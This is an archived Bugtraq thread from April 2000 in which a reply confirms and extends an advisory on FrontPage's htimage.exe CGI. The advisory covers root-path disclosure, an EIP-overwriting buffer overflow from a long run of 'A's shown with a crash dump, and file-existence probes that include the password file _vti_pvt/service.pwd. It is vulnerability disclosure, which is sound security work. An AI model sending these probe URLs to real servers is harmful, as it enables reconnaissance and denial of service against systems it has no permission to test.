Bugtraq mailing list archives
Re: More vulnerabilities in FP
From: cyberiad () CYBERUS CA (The Cyberiad)
Date: Wed, 19 Apr 2000 08:08:25 -0400
Hello, I confirmed the 742-A's caused a page fault in KERNEL32.DLL at 0167:bff87ede under FP 3.0.2.1105, installed with PWS under Windows 98 (PWS.EXE Version 4.02.0690). However, this length did not force A's into the EIP. Instead the stack pointer is corrupted, now pointing to invalid memory (which caused the page fault). The relationship of the corrupted stack pointer to the input overflow data is unclear (its not 0x41414141) so I'll have to do some more reverse engineering; I did try longer strings with the same result. As well, the file existence test listed under Problem#3 works for files outside of the webroot but on the same volume. For example, if your webroot is at d:\Inetpub\wwwroot, the request, http://server/cgi-bin/htimage.exe/test.doc?0,0 will test for the existence of a file d:\test.doc. Note however, that htimage.exe checks for the file d:\Inetpub\wwwroot\test.doc first and and then d:\test.doc. It does not allow me to test for file existence on other volumes. Cyberiad ----- Original Message ----- From: Narrow <narrow () HOBBITON ORG> To: <BUGTRAQ () SECURITYFOCUS COM> Sent: Tuesday, April 18, 2000 2:40 PM Subject: More vulnerabilities in FP
[ Reader(s), please Cc: your comments/etc to narrow () hobbiton org ]
---------------------------------------------------------------------------- ----
-------[ Legion2000 - Russian Security Team (ADV-150400#1) ]------- www.legion2000.cc ---- INFORMATION ---- Program Name : CERN Image Map Dispatcher Discovered By : Narrow (narrow () hobbiton org) --------------------- Problem Description ~~~~~~~~~~~~~~~~~~~ CERN Image Map Dispatcher (/cgi-bin/htimage.exe) comes by default with
FrontPage. I found three bugs
in "htimage.exe": 1) Gives us the full path to the root directory 2)
Simple buffer overflow 3) Allow
us to access files. Problem #1 ~~~~~~~~~~ Like I said, the first bug gives us the full path to the root directory. I
tested this vulnerability
against some servers, all where vulnerable! Tested / Vulnerable FP Servers: 3.0.2.926 (FrontPage'98), 3.0.2.1706,
4.0.2.2717, 2.0.1.927, 3.0.2.926,
3.0.2.1105, 3.0.2.1330, 3.0.2.1117 (All Windows based web servers are
vulnerable if we have premission
to execute "htimage.exe" + If "htimage.exe" exist). To test this vulnerability we need "htimage.exe" in our "cgi-bin"
directory (it's installed by default)
and premission to execute it. That's why only Windows is vulnerable, Unix
based systems can't execute
"*.exe" files. If we access "htimage.exe" using our favorite web browser like:
http://server/cgi-bin/htimage.exe/linux?0,0
we get this error: --------------------------------------------------------------------------
----------
Error Error calling HTImage: Picture config file not found, tried the following: q:/hidden_directory_because_of_the_script_kiddies/webroot/linux /linux --------------------------------------------------------------------------
----------
Now we know that the path to the root directory is
"q:/hidden_directory_because_of_the_script_kiddies/webroot/".
Problem #2 ~~~~~~~~~~ Like I said, simple buffer overflow. Tested against "Microsoft-PWS-95/2.0"
and "FrontPage-PWS32".
Tested / Vulnerable OS: Windows'95/98 "htimage.exe" buffer overflows if we access it like:
<A HREF="http://server/cgi-bin/htimage.exe/<741">http://server/cgi-bin/htimage.exe/<741</A> A's>?0,0.
--------------------------------------------------------------------------
----------
HTIMAGE caused an invalid page fault in module <unknown> at 0000:41414141. Registers: 0EAX=815c6240 CS=0137 EIP=41414141 EFLGS=00010246 EBX=0063fe28 SS=013f ESP=005400b4 EBP=005400d4 ECX=0054015c DS=013f ESI=005401a0 FS=3467 EDX=bff76648 ES=013f EDI=00540184 GS=0000 Bytes at CS:EIP: Stack dump: bff7663c 00540184 0063fe28 005401a0 0054015c 00540290 bff76648 0063fe28 0054016c bff85a0a 00540184 0063fe28 005401a0 0054015c 41414141 0054034c --------------------------------------------------------------------------
----------
<Server still running> + <500 Server Error> First remote FrontPage exploit? Problem #3 ~~~~~~~~~~ It's not a serious bug. Using "htimage.exe" we can access files on server,
but
we can't read them. Accessing "htimage.exe" like:
http://server/cgi-bin/htimage.exe/_vti_pvt/service.pwd?0,0
outputs: --------------------------------------------------------------------------
----------
Error Error calling HTImage: HTImage.c: Syntax error at line 1 Bad field name, expecting 'default',
'rectangle', 'circle' or
'polygon' (got an alphanumeric string) --------------------------------------------------------------------------
----------
NOTE: Accessing "/_vti_pvt/service.pwd" outputs : 403 Forbidden Solution ~~~~~~~~ 1) Remove "htimage.exe". 2) Do not use FrontPage, simple enough :) Comments ~~~~~~~~ Sorry for my bad english, not my mother/father language ;)
Current thread:
- Re: XFree86 server overflow, (continued)
- Re: XFree86 server overflow Pawe³ Sakowski (Apr 17)
- RAZOR Analysis of dvwssr.dll Simple Nomad (Apr 17)
- response to the bugtraq report of buffer overruns in imapd LIST command Mark Crispin (Apr 17)
- Re: response to the bugtraq report of buffer overruns in imapd LIST command Theo de Raadt (Apr 17)
- Re: response to the bugtraq report of buffer overruns in imapd LIST command Mark Crispin (Apr 17)
- Re: response to the bugtraq report of buffer overruns in imapd LIST command R. C. Dowdeswell (Apr 17)
- xfs security issues (fwd) Chris Evans (Apr 17)
- Re: response to the bugtraq report of buffer overruns in imapd LIST command Mark Crispin (Apr 17)
- RUS-CERT Advisory 200004-01: GNU Emacs 20 RUS-CERT, University of Stuttgart (Apr 18)
- More vulnerabilities in FP Narrow (Apr 18)
- Re: More vulnerabilities in FP The Cyberiad (Apr 19)
- Re: More vulnerabilities in FP Ron van Daal (Apr 22)
- Re: More vulnerabilities in FP The Cyberiad (Apr 19)
- AVM's Statement eAX [Teelicht] (Apr 19)
- Adtran DoS Mike Ireton (Apr 19)
- FreeBSD Security Advisory: FreeBSD-SA-00:13.generic-nqs FreeBSD Security Officer (Apr 19)
- Re: response to the bugtraq report of buffer overruns in imapd LIST command Warner Losh (Apr 17)
- pwdump2 for Active Directory Todd Sabin (Apr 18)
- Re: response to the bugtraq report of buffer overruns in imapd LIST command Henrik Nordstrom (Apr 18)
- Cooments on the dvwssr.dll vulnerability threads Iván Arce (Apr 17)
- Re: Cooments on the dvwssr.dll vulnerability threads David LeBlanc (Apr 18)